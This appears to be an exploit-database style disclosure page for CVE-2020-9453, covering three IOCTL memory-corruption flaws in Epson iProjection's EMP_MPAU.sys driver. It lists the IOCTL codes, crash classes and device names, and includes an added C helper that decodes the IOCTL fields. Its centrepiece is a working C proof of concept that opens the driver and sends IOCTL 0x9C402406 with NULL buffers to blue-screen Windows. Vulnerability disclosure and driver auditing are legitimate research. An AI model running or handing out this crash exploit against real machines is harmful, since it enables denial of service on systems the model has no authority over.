Epson iProjection - EMP_MPAU.sys (CVE-2020-9453)
PoC exploits for various vulnerabilities found in the EMP_MPAU.sys driver associated with Epson's iProjection software
# Exploit Title: Epson iProjection v2.30 Driver EMP_MPAU.sys Memory Corruption
# Date: 02/15/2020
# Exploit Author: FULLSHADE
# Vendor Homepage: https://epson.com
# Software Link: https://www.epson.eu/epson-projector-software
# Version: v.2.30
# Tested on: Windows 7 / Windows 10
# CVE : CVE-2020-9453
EMP_MPAU.sys
The EMP_MPAU.sys driver shipped with Epson iProjection v2.30 contains three vulnerabilities, each reachable through an IOCTL handled in the sub_1300C function.

| Address | IOCTL Code | Device | Function | Method | Access |
|---|---|---|---|---|---|
| 0x1303B | 0x9C402402 | <UNKNOWN> 0x9C40 | 0x900 | METHOD_OUT_DIRECT 2 | FILE_ANY_ACCESS (0) |
| 0x13047 | 0x9C402406 | <UNKNOWN> 0x9C40 | 0x901 | METHOD_OUT_DIRECT 2 | FILE_ANY_ACCESS (0) |
| 0x1304F | 0x9C40240A | <UNKNOWN> 0x9C40 | 0x902 | METHOD_OUT_DIRECT 2 | FILE_ANY_ACCESS (0) |
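The Device, Function, Method and Access columns above follow from the bit layout of a Windows I/O control code (the CTL_CODE macro). The decoder below is an added example, not code from the original PoC; the names `decode_ioctl` and `is_vendor_any_access` are chosen here for illustration. It recomputes those columns and flags vendor-defined codes that require no access right on the handle, which is the property a driver audit would check first.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Fields of a Windows I/O control code (CTL_CODE bit layout). */
typedef struct {
    uint32_t device_type; /* bits 31..16 */
    uint32_t access;      /* bits 15..14, 0 = FILE_ANY_ACCESS */
    uint32_t function;    /* bits 13..2 */
    uint32_t method;      /* bits 1..0 */
} ioctl_fields;

static const char *const METHOD_NAMES[4] = {
    "METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"
};
static const char *const ACCESS_NAMES[4] = {
    "FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
    "FILE_READ_ACCESS|FILE_WRITE_ACCESS"
};

/* Illustrative helper (not from the page): split a code into its fields. */
ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      =  code        & 0x3u;
    return f;
}

/* Vendor-defined code (device type >= 0x8000, function >= 0x800) for which
   the I/O manager requires no read or write access on the caller's handle. */
int is_vendor_any_access(uint32_t code)
{
    ioctl_fields f = decode_ioctl(code);
    return f.device_type >= 0x8000u && f.function >= 0x800u && f.access == 0;
}

int main(void)
{
    /* The three IOCTL codes listed in the table above. */
    const uint32_t codes[] = { 0x9C402402u, 0x9C402406u, 0x9C40240Au };
    for (size_t i = 0; i < sizeof codes / sizeof codes[0]; i++) {
        ioctl_fields f = decode_ioctl(codes[i]);
        printf("0x%08X dev=0x%04X func=0x%03X %s %s%s\n", (unsigned)codes[i],
               (unsigned)f.device_type, (unsigned)f.function,
               METHOD_NAMES[f.method], ACCESS_NAMES[f.access],
               is_vendor_any_access(codes[i]) ? " [any handle accepted]" : "");
    }
    return 0;
}
```

The device type 0x9C40 falls in the vendor-defined range, which is why the decoder output in the table labels it `<UNKNOWN>`.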
IOCTL crash classes:
| IOCTL | WinDBG BUGCHECK_STR | DEFAULT_BUCKET_ID | POC RESULT |
|---|---|---|---|
| 0x9C402402 | ACCESS_VIOLATION | NULL_CLASS_PTR_DEREFERENCE | BSOD |
| 0x9C402406 | ACCESS_VIOLATION | CODE_CORRUPTION | BSOD |
| 0x9C40240A | ACCESS_VIOLATION | CODE_CORRUPTION | BSOD |
Device names:
- \Device\EMPMPAUIO
- \DosDevices\EMPMPAU
BSOD crash POC outline skeleton code
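```c
#include <stdio.h>
#include <tchar.h>
#include <windows.h>

int _tmain(int argc, _TCHAR* argv[])
{
    HANDLE m_handle = INVALID_HANDLE_VALUE;
    DWORD nbBytes = 0;

    /* Open the driver's DosDevices symbolic link (\DosDevices\EMPMPAU). */
    m_handle = CreateFileA("\\\\.\\EMPMPAU", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
    if (m_handle == INVALID_HANDLE_VALUE) {
        printf("CreateFileA failed: %lu\n", GetLastError());
        return 1;
    }

    /* Send IOCTL 0x9C402406 with NULL, zero-length input and output buffers. */
    DeviceIoControl(m_handle, 0x9C402406, (LPVOID)0, 0x0, (LPVOID)0, 0x0, &nbBytes, NULL);
    CloseHandle(m_handle);
    return 0;
}
```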
